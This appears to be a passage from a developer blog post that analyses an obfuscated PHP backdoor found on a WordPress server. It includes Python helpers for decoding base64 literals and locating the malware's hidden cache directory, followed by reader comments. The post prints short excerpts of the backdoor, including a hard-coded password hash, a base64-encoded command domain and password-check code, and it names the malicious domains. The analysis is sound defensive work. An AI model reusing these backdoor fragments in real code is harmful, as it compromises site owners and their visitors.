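The same decoding step can be automated across a whole file when triaging a sample like this one. The sketch below is an added example, not part of the original post: it pulls every literal argument to base64_decode() out of PHP source, decodes it, and keeps the results that look like hostnames. The function names and the hostname regex are assumptions of this example; the sample lines are copied from the decoded script above.

```python
import base64
import binascii
import re

# Matches base64_decode("...") / base64_decode('...') with a literal argument only.
B64_CALL = re.compile(r"""base64_decode\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
# Conservative hostname shape: dot-separated labels ending in an alphabetic TLD.
HOSTNAME = re.compile(
    r"^(?=.{4,253}$)([a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,24}$", re.I
)

def decode_literals(php_source):
    """Return (encoded, decoded_text) for every decodable base64_decode literal."""
    found = []
    for _quote, encoded in B64_CALL.findall(php_source):
        try:
            text = base64.b64decode(encoded, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not plain text
        if text.isprintable():
            found.append((encoded, text))
    return found

def extract_hostnames(php_source):
    """Decoded literals that look like hostnames, de-duplicated, in file order."""
    hosts = []
    for _encoded, text in decode_literals(php_source):
        if HOSTNAME.match(text) and text.lower() not in hosts:
            hosts.append(text.lower())
    return hosts

# Lines taken from the decoded sample on this page.
SAMPLE = '''
$md5pass="e5e4570182820af0a183ce1520afe43b";
$domain=base64_decode("aW5kaWthdGVpdC5ydQ==");
if ($x!="")$p=md5(@base64_decode(get_val("p")));
'''

if __name__ == "__main__":
    for host in extract_hostnames(SAMPLE):
        print(host)
```

Calls whose argument is a variable or another function call, such as base64_decode(get_val("p")), are skipped because their value is only known at run time.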
This decoded base64 script references $_COOKIE, $_SERVER & $_REQUEST, the same variables which the first file referenced.
Update: Upon googling some of the base64-decoded code, I found a link on UnPHP to someone who had deobfuscated similar code.
However, the domain in this one was hlemovka.ru
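The decoded script also shows where it keeps its data on disk: a hidden directory named "." followed by md5 of the host name (lower-cased, "www." removed), holding emoji1.png, metaicons.jpg and wp-themesall.gif. The following is an added example, not part of the original post, that searches a web root for that artefact; the function names are assumptions of this example, and the test fixture is constructed.

```python
import hashlib
import os
import re
import tempfile

DROPPED_FILES = {"emoji1.png", "metaicons.jpg", "wp-themesall.gif"}  # names from the sample
HIDDEN_MD5_DIR = re.compile(r"^\.[0-9a-f]{32}$")

def cache_dir_name(http_host):
    """Directory name the sample derives from the Host header: '.' + md5(host)."""
    host = http_host.lower().replace("www.", "")  # mirrors strtolower + str_replace
    return "." + hashlib.md5(host.encode()).hexdigest()

def find_cache_dirs(webroot, hostnames=()):
    """Return (path, dropped_files_present, matched_host) for suspicious hidden dirs."""
    expected = {cache_dir_name(h): h for h in hostnames}
    hits = []
    for current, dirs, _files in os.walk(webroot):
        for name in dirs:
            if not HIDDEN_MD5_DIR.match(name):
                continue
            path = os.path.join(current, name)
            present = sorted(DROPPED_FILES & set(os.listdir(path)))
            # Report if the known file names are there, or the name matches a known host.
            if present or name in expected:
                hits.append((path, present, expected.get(name)))
    return hits

def build_constructed_webroot(root, host):
    """Constructed fixture: a fake web root with one planted cache directory."""
    planted = os.path.join(root, "wp-content", "uploads", cache_dir_name(host))
    os.makedirs(planted)
    for name in ("emoji1.png", "metaicons.jpg"):
        open(os.path.join(planted, name), "w").close()
    os.makedirs(os.path.join(root, "wp-includes", ".git"))  # benign hidden directory
    return planted

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_constructed_webroot(root, "www.example.com")
        for path, present, host in find_cache_dirs(root, ["example.com"]):
            print(path, present, host)
```

The sample falls back to the system temp directory when nothing under the web root is writable, so run the same search there as well.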
Top comments (3)
Nice job!
I've a question: how did this code end up on the server of your friend?
For now, my conclusion is: don't use WordPress. I've so many requests on my server trying to connect to the WordPress admin (even if my website is not a WordPress), it's insane.
Thanks for the comment.
My friend thinks it may be to do with his comment fields: potentially not sanitizing inputs.
Just noticed this issue on our own site. Might want to check the web.config file too.
boyet.com/blog/godaddy-shared-wind...